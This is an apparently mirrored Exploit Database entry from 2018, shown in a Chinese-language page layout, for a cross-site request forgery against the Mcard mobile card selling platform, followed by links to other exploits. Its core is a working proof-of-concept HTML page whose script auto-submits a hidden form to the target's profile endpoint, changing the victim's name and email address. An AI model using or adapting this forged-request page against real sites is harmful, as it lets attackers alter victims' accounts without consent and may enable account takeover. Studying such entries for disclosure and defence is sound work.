Mobile Card Selling Platform 1 – Cross-Site Request Forgery

Exploit Database
99 阅读

作者： L0RD

日期： 2018-05-23
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/44716/

# Exploit Title:Mcard - Mobile Card Selling Platform 1 - Cross-Site Request Forgery
# Date: 2018-05-23
# Exploit Author: L0RD
# Vendor Homepage: https://codecanyon.net/item/mcard-mobile-card-selling-platform/19307193?s_rank=15
# Version: 1
# Tested on: Kali linux

# POC :

<html>
<head>
 <title>CSRF POC</title>
</head>
<body>
<form action="http://Target/card/profile" method="POST">
<input type="hidden" name="fname" value="decode" />
<input type="hidden" name="lname" value="test" />
<input type="hidden" name="email" value="lord&#46;decode&#64;gmail&#46;com" />
</form>
 <script>
 document.forms[0].submit();
 </script>
</body>
</html>

last Exploits
Mobile Card Selling Platform 1 – Cross-Site Request Forgery的更多信息

Cipi Control Panel 3.1.15 – Stored Cross-Site Scripting (XSS) (Authenticated)：
Jenkins 2.235.3 – ‘X-Forwarded-For’ Stored XSS：
Limny 2.0 – Cross-Site Request Forgery (Create Admin User)：
Insky CMS 006-0111 – Multiple Remote File Inclusions：
Water Billing System 1.0 – ‘id’ SQL Injection (Authenticated)：
Joomla! Component com_jnews 8.5.1 – SQL Injection：
Restaurant Management System 1.0 – SQL Injection：
Iris ID IrisAccess ICU 7000-2 – Remote Command Execution：